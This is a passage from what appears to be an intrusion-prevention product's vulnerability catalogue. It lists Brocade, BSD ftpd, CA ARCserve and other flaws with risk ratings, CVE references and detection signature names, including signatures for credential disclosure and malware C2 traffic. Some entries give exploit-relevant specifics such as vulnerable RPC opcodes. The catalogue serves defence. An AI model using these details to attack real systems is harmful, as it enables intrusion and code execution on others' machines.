Situation: HTTP_CRL-Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal
References:
CVE-2016-8207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8207
Back to top

Brocade-Network-Advisor-Dashboardfilereceiveservlet-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Brocade Network Advisor
Risk: High
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Brocade Network Advisor
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Brocade Network Advisor. A remote, unauthenticated attacker can use this to execute arbitrary code with SYSTEM privileges on the affected system.
Situation: HTTP_CSH-Brocade-Network-Advisor-Filename-Directory-Traversal
References:
CVE-2016-8205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8205
Back to top

Brocade-Network-Advisor-Filereceiveservlet-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Brocade Network Advisor
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Brocade Network Advisor
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Brocade Network Advisor. A remote, unauthenticated attacker can use this to execute arbitrary code with SYSTEM privileges on the affected system.
Situation: HTTP_CSH-Brocade-Network-Advisor-Filename-Directory-Traversal
References:
CVE-2016-8204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8204
Back to top

Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Brocade Network Advisor
Risk: High
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Brocade Network Advisor
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Brocade Network Advisor. A remote, unauthenticated attacker can use this to cause a denial-of-service condition.
Situation: HTTP_CSH-Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal
References:
CVE-2016-8206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8206
Back to top

BSD-Ftpd-Off-By-One-BOF

About this vulnerability: Off-by-one buffer overflow in BSD ftpd
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux; BSD
Software: BSD ftpd
Type: Integer Overflow
Description: Unpathced BSD ftpd daemons have a remotely exploitable buffer overflow vulnerability. If successfully exploited, this vulnerability provides the attacker a remote root access.
Situation: FTP_CS-Bsdftpd-One-Byte-BOF-Mkd
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-1
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-2
References:
CVE-2001-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0053
BID-2124
http://www.securityfocus.com/bid/2124
Back to top

Buer-Loader-C2-Traffic

About this vulnerability: Buer Loader C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Buer is a malicious loader that downloads and executes payloads on the target system.
Situation: HTTP_CSU-Buer-Loader-C2-Traffic
Back to top

Bugbear-Worm

About this vulnerability: BugBear Worm
Risk: Low
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Code Injection
Description: BugBear is a worm that spreads by e-mail.
Situation: HTTP_CSH-Bugbear-Worm-Download
Back to top

Business-Objects-Crystal-Reports-Rpt-File-Handling

About this vulnerability: A buffer overflow vulnerability in Business Objects Crystal Reports
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Business Objects Crystal Enterprise; Crystal Reports; Microsoft Visual Studio 2005; Microsoft Visual Studio .NET 2002; Microsoft Visual Studio .NET 2003
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the way Business Objects Crystal Reports handles RPT files. Versions of Crystal Reports are included with Microsoft's Visual Studio .NET 2002 and 2003, as well as Visual Studio 2005 products. The vulnerable application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. An attacker may exploit this issue by enticing a user into opening a malicious RPT file, resulting in the execution of arbitrary code with the privileges of the currently logged-in user. Failed exploit attempts are likely to result in denial of service conditions.
Situation: HTTP_Business-Objects-Crystal-Reports-Rpt-File-Handling
File-OLE_Business-Objects-Crystal-Reports-Rpt-File-Handling
References:
CVE-2006-6133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6133
BID-21261
http://www.securityfocus.com/bid/21261
MS07-052
http://technet.microsoft.com/security/bulletin/MS07-052
Back to top

Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in BusyBox Project BusyBox
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BusyBox
Type: Malfunction
Description: Insufficient validation of DHCP packets causes an out of bounds read vulnerability in BusyBox. A successful exploit may be used to gain access to sensitive information.
Situation: BOOTP_CS-Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read
References:
CVE-2018-20679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20679
Back to top

BYOB-Arbitrary-File-Write-And-Command-Injection

About this vulnerability: A vulnerability in Build Your Own Botnet
Risk: High
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Unix; Linux
Software: Build Your Own Botnet
Type: Input Validation
Description: A vulnerability in BYOB (Build Your Own Botnet), which allows remote attackers to create a new admin user through an unathenticated file write, and achieve command injection through the payload generation page.
Situation: HTTP_CRL-BYOB-Arbitrary-File-Write-And-Command-Injection
References:
CVE-2024-45257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45257
Back to top

BZip2-Compressed-File

About this vulnerability: BZip2 archive
Risk: Low
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: bzip2
Type: Insecure Configuration
Description: bzip2 is a widely used compression format file format. These compressed files may be used to import executable content into the target system.
Situation: HTTP_SS-BZip2-Compressed-File-Download
File-Binary_BZip2-Compressed-File-Download
Back to top

CA-Arcserve-Backup-Authentication-Service-Invalid-Virtual-Function-Call

About this vulnerability: A vulnerability in CA ARCserve Backup (For Windows)
Risk: Moderate
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup
Type: Input Validation
Description: There is an input validation vulnerability in the CA ARCserve Backup authentication service, caauthd.exe. The vulnerability is due to insufficient validation of "opcode 0x7a" Remote Procedure Calls (RPC) sent to CA ARCserve backup. A remote unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code in the context of the affected service, which is normally SYSTEM.
Situation: SunRPC_CS-CA-Arcserve-Backup-Authentication-Invalid-Virtual-Function-Call
References:
CVE-2012-2971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2971
OSVDB-86416
http://www.osvdb.org/86416
Back to top

CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow

About this vulnerability: A vulnerability in CA ARCserve Backup for Laptops and Desktops
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way CA ARCserve Backup for Laptops and Desktops service handles incoming messages.
Situation: Generic_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow
References:
CVE-2008-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175
BID-30472
http://www.securityfocus.com/bid/30472
Back to top

CA-ARCserve-Backup-For-Laptops-And-Desktops-Lgserver-Handshake-Buffer-Overflow

About this vulnerability: A vulnerability in CA ARCserve Backup for Laptops and Desktops
Risk: High
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the way the Computer Associates ARCserve Backup for Laptops and Desktops service handles incoming messages. A remote unauthenticated attacker can send a specially-crafted message to the LGServer service to trigger the vulnerability, and potentially execute arbitrary code on the target host with System privileges.
Situation: ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Hex-Mode-Buffer-Overflow
References:
CVE-2008-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175
BID-30472
http://www.securityfocus.com/bid/30472
Back to top

CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in CA ARCserve Backup for Laptops and Desktops
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Buffer Overflow
Description: There exist multiple buffer overflow vulnerabilities in the way CA ARCserve Backup for Laptops and Desktops service handles incoming messages. Specifically the vulnerabilities are due to lack of boundary check when processing several different kinds of user requests. By sending specially crafted requests, an unauthenticated remote attacker can leverage these flaws to execute arbitrary code on the target host with System privileges. In an attack case where code injection is not successful, the affected service will terminate unexpectedly. This will create a denial of service condition of the affected service. In a more sophisticated attack where code injection results in successful process flow diverting, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the running process, normally System.
Situation: ARCserve_CS-CA-Arcserve-Backup-rxsUseLicenseIni-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsLicGetSiteId-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsGetLogFileNames-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsGetBackupLog-BOF
ARCserve_CS-CA-Arcserve-Backup-Unauthenticated-Access
ARCserve_CS-CA-Arcserve-Backup-rxstBackupComplete-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsSetDataGrowthScheduleAndFilter-BOF
ARCserve_CS-CA-Arcserve-Backup-rxsSetDefaultConfigName-BOF
References:
CVE-2007-3216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216
BID-24348
http://www.securityfocus.com/bid/24348
OSVDB-35329
http://www.osvdb.org/35329
Back to top

CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-Code-Execution

About this vulnerability: A vulnerability in CA ARCserve Backup for Laptops and Desktops
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way CA ARCserve Backup for Laptops and Desktops service handles incoming messages. A remote unauthenticated attacker can send specially crafted commands to the LGServer service to trigger a buffer overflow and execute arbitrary code on the target host with System privileges. In an attack case where code injection is not successful, the affected service will terminate unexpectedly. This will create a denial of service condition of the affected service. In a more sophisticated attack where code injection results in successful process flow diverting, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the running process, normally System.
Situation: ARCserve_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-BOF
ARCserve_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-BOF-2
References:
CVE-2008-1328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1328
BID-28616
http://www.securityfocus.com/bid/28616
Back to top

CA-Arcserve-Backup-Lgserver-Handshake-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops
Risk: High
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Assoicates ARCserve Backup. A remote unauthenticated attacker can send specially crafted message to the LGServer service to trigger the vulnerability, potentially execute arbitrary code on the target host with System privileges.
Situation: ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Integer-Overflow
ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Buffer-Overflow
References:
CVE-2008-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3175
BID-30472
http://www.securityfocus.com/bid/30472
Back to top

CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service

About this vulnerability: A vulnerability in ARCserve Backup
Risk: Moderate
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Input Validation
Description: There is a denial of service vulnerability in Computer Associates' ARCserve Backup Message Engine. The vulnerability is due to insufficient data validation. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted message to the target server. A successful attack would create a denial of service condition to the Message Engine service.
Situation: MSRPC-TCP_CPS-CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service
References:
CVE-2009-1761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1761
BID-35396
http://www.securityfocus.com/bid/35396
Back to top

CA-Arcserve-Backup-NetBackup-Arbitrary-File-Upload

About this vulnerability: A security bypass vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops
Risk: High
First detected in: sgpkg-ips-152-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite
Type: Malfunction
Description: There is a security bypass vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops. A remote attacker can send a malicious file upload request to upload arbitrary files to the target host. Depending on the file uploaded, a successful attack may lead to arbitrary code execution with System privileges.
Situation: ARCserve_CS-CA-ARCserve-Backup-NetBackup-Arbitrary-File-Upload
References:
CVE-2008-1329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1329
BID-28616
http://www.securityfocus.com/bid/28616
OSVDB-44328
http://www.osvdb.org/44328
Back to top

CA-ARCserve-D2D-Axis2-Default-Credentials

About this vulnerability: A vulnerability in CA ARCserve D2D
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: CA ARCserve D2D
Type: Malfunction
Description: There is a vulnerability in CA ARCserve D2D. The vulnerability is due to an authentication weakness in the Apache Axis component of the product. When the software is installed, default credentials are assigned to the Axis2 web services component. A remote attacker can leverage this vulnerability to upload a malicious web service to a target system, enabling arbitrary code execution within the security context of an Axis2 web service, by default SYSTEM.
Situation: HTTP_CRL-Apache-Axis2-Default-Credentials
References:
BID-45625
http://www.securityfocus.com/bid/45625
Back to top

CA-ARCserve-D2D-Credential-Disclosure

About this vulnerability: A CA ARCserve D2D Credential Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA ARCserve D2D
Type: Configuration Error
Description: A vulnerability in CA ARCserve D2D r15 which allows remote attackers to obtain credentials, and execute arbitrary commands via a specially crafted RPC request.
Situation: HTTP_CS-CA-ARCserve-D2D-Credential-Disclosure
References:
CVE-2011-3011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3011
BID-48897
http://www.securityfocus.com/bid/48897
OSVDB-74162
http://www.osvdb.org/74162
Back to top

CA-Arcserve-D2D-GWT-RPC-Request-Credentials-Disclosure

About this vulnerability: A vulnerability in CA ARCserve D2D
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: CA ARCserve D2D
Type: Malfunction
Description: A code execution vulnerability exists in CA ARCserve D2D. The vulnerability is due to an information disclosure while processing Google Web Toolkit (GWT) RPC requests. When the software is installed, the administrator credentials are stored in clear text in a file with fixed name. A remote attacker can leverage this vulnerability to download this not properly secured file from a target system, and later log in using the acquired credentials.
Situation: HTTP_CS-CA-ARCserve-D2D-Credential-Disclosure
References:
BID-48897
http://www.securityfocus.com/bid/48897
OSVDB-74162
http://www.osvdb.org/74162
Back to top

CA-BrightStor-Arcserve-Backup-Caloggerd-Opcode-79-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in CA ARCserve Backup
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup product. The vulnerability is due to insufficient bounds checking in the user supplied data contained inside the requests sent to the caloggerd service. A remote unauthenticated attacker may leverage this vulnerability to inject and execute arbitrary code on the target host with System level privileges. In an attack case where code injection is not successful the affected service will terminate abnormally. In a more sophisticated attack, where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the service process. On Windows systems, the affected service is running with System privileges, by default configuration.
Situation: SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Caloggerd-Stack-Buffer-Overflow
Back to top

CA-BrightStor-Arcserve-Backup-Discovery-Service-Hostname-Buffer-Overflow

About this vulnerability: Code execution vulnerability in Computer Associates BrightStor ArcServe Backup Discovery Service
Risk: Moderate
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: The Discovery Service of Computer Associates BrightStor ARCserve Backup suffers from a vulnerability where a long hostname in a proprietary protocol can be used to overflow a buffer. The vulnerability can be used by remote attackers to execute arbitrary code with SYSTEM level privileges.
Situation: Generic_SS-CA-BrightStor-Arcserve-Backup-Discovery-Service-Buffer-Overflow
References:
CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143
BID-20365
http://www.securityfocus.com/bid/20365
Back to top

CA-BrightStor-Arcserve-Backup-Lgserver-Arbitrary-File-Upload

About this vulnerability: A vulnerability in CA ARCserve Backup for Laptops and Desktops
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite 2
Type: Code Injection
Description: There is a an arbitrary file upload vulnerability in CA BrightStor ARCServe Backup for Laptops and Desktops. The vulnerability is due to insufficient access control in the LGServer process while handling file uploads from remote users. A remote unauthenticated attacker could exploit this vulnerability to upload a file to a specified location on the target file system. Moreover, the attacker can facilitate other functionalities of the affected server to load and execute the uploaded file with System privileges.
Situation: ARCserve_CS-CA-BrightStor-ARCserve-Backup-Lgserver-Arbitrary-File-Upload
References:
CVE-2007-5005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5005
BID-24348
http://www.securityfocus.com/bid/24348
Back to top

CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow

About this vulnerability: A vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops. The flaw is due to insufficient checks of user-supplied data inside requests sent to the backup server. A remote unauthenticated attacker may leverage this vulnerability to inject and execute arbitrary code on the target host with System level privileges.
Situation: Generic_CS-CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow
References:
CVE-2007-0449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449
BID-22340
http://www.securityfocus.com/bid/22340
OSVDB-31593
http://www.osvdb.org/31593
Back to top

CA-BrightStor-Arcserve-Backup-Lgserver-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops. The flaw is due to insufficient checks of user-supplied data inside requests sent to the backup server. A remote unauthenticated attacker may exploit this vulnerability to inject and execute arbitrary code on the target host with System-level privileges.
Situation: ARCserve_CS-CA-BrightStor-ARCserve-Backup-Lgserver-Stack-Buffer-Overflow
References:
CVE-2007-0449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449
BID-22342
http://www.securityfocus.com/bid/22342
OSVDB-31593
http://www.osvdb.org/31593
Back to top

CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Code-Execution-Vulnerability

About this vulnerability: Code execution vulnerability in Computer Associates BrightStor ArcServe Backup Media server
Risk: Moderate
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Malfunction
Description: The Media Server RPC service of Computer Associates BrightStor ARCserver Backup suffers from a vulnerability where a user supplied value is used to reference to a memory address in the server. The vulnerability allows a remote attacker to execute arbitrary code by supplying a memory address that contains data controlled by the attacker. A successful exploit requires no authentication and may lead to code execution with System level privileges.
Situation: Generic_UDP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Handle-T
SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Vulnerability
References:
CVE-2007-1785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1785
BID-23209
http://www.securityfocus.com/bid/23209
Back to top

CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the CA BrightStor ARCserve Backup Message Engine service
Risk: High
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Computer Associates BrightStor ARCserve Backup Message Engine service. By calling the vulnerable RPC method that has opnum 47 with an excessively long string argument, a remote attacker can compromise the vulnerable system.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow
References:
CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169
BID-22005
http://www.securityfocus.com/bid/22005
OSVDB-31327
http://www.osvdb.org/31327
Back to top

CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Computer Associates ARCserve Backup Message Engine
Risk: Moderate
First detected in: sgpkg-ips-227-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Malfunction
Description: There is a denial of service vulnerability in the Computer Associates ARCserve Backup Message Engine. An unauthenticated remote attacker can send a crafted RPC message with opcode 0x13 to the affected interface to cause a denial of service condition.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service
References:
CVE-2009-1761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1761
BID-35396
http://www.securityfocus.com/bid/35396
OSVDB-55226
http://www.osvdb.org/55226
Back to top

CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure

About this vulnerability: A vulnerability in CA BrightStor Enterprise Backup
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor Enterprise Backup; Computer Associates BrightStor ARCserve Backup; Computer Associates Business Protection Suite; Computer Associates Business Protection Suite for Microsoft SBS; Computer Associates Server Protection Suite
Type: Malfunction
Description: There exist unsecured Remote Procedure Call (RPC) methods in the Message Engine service of CA BrightStor Backup product.
Situation: MSRPC-TCP_CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure
References:
CVE-2007-5328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5328
BID-26015
http://www.securityfocus.com/bid/26015
Back to top

CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF

About this vulnerability: Buffer overflow vulnerability in the CA BrightStor ARCserve Backup Message Engine service
Risk: High
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Computer Associates BrightStor ARCserve Backup Message Engine service. By calling the vulnerable RPC method that has opnum 117 with an excessively long string argument, a remote attacker can compromise the vulnerable system.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF
References:
CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169
BID-22005
http://www.securityfocus.com/bid/22005
OSVDB-31327
http://www.osvdb.org/31327
Back to top

CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS

About this vulnerability: Denial of service vulnerability in Computer Associates BrightStor ARCserve Backup system
Risk: Moderate
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Malfunction
Description: There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Backup system due to null pointer dereference error. A crafted Portmap RPC call TADDR2UADDR with a malicious actual length value can be used to terminate the affected service, leading to a denial of service condition.
Situation: Generic_CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS
References:
CVE-2007-0816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0816
BID-22365
http://www.securityfocus.com/bid/22365
OSVDB-32989
http://www.osvdb.org/32989
Back to top

CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Call-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Malfunction
Description: There is a memory corruption vulnerability in Computer Associates BrightStor ARCserve Backup Tape Engine. A crafted RPC message with a malicious JobHandle value allows the compromise of a vulnerable system.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-Access
References:
CVE-2007-1447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1447
BID-22994
http://www.securityfocus.com/bid/22994
OSVDB-32990
http://www.osvdb.org/32990
Back to top

CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF

About this vulnerability: Buffer overflow vulnerability in CA BrightStor ARCserve Backup
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: Computer Associates BrightStor ARCserve Backup has a stack buffer overflow vulnerability. By calling the vulnerable GetGroupStatus function with an excessively long group name argument, a remote attacker can cause a denial of service or execute System-level arbitrary code.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF
References:
CVE-2006-6076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6076
BID-21221
http://www.securityfocus.com/bid/21221
OSVDB-30637
http://www.osvdb.org/30637
Back to top

CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF

About this vulnerability: Buffer overflow vulnerability in CA BrightStor ARCserve Backup
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: Computer Associates BrightStor ARCserve Backup has a stack buffer overflow vulnerability. By calling the vulnerable ReserveGroup function with an excessively long group name argument, a remote attacker can compromise the vulnerable system.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF
References:
CVE-2006-6076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6076
BID-21221
http://www.securityfocus.com/bid/21221
OSVDB-30637
http://www.osvdb.org/30637
Back to top

CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in CA BrightStor ARCserve/Enterprise Backup
Risk: High
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in CA BrightStor ARCserve/Enterprise Backup. A successful exploitation of this vulnerability may lead to privileged arbitarary code execution.
Situation: X11_CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow
References:
CVE-2005-1018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1018
BID-13102
http://www.securityfocus.com/bid/13102
OSVDB-15471
http://www.osvdb.org/15471
Back to top

CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup
Risk: High
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup. By sending a crafted RPC request with an excessively long string parameter, a remote unauthenticated attacker can cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.
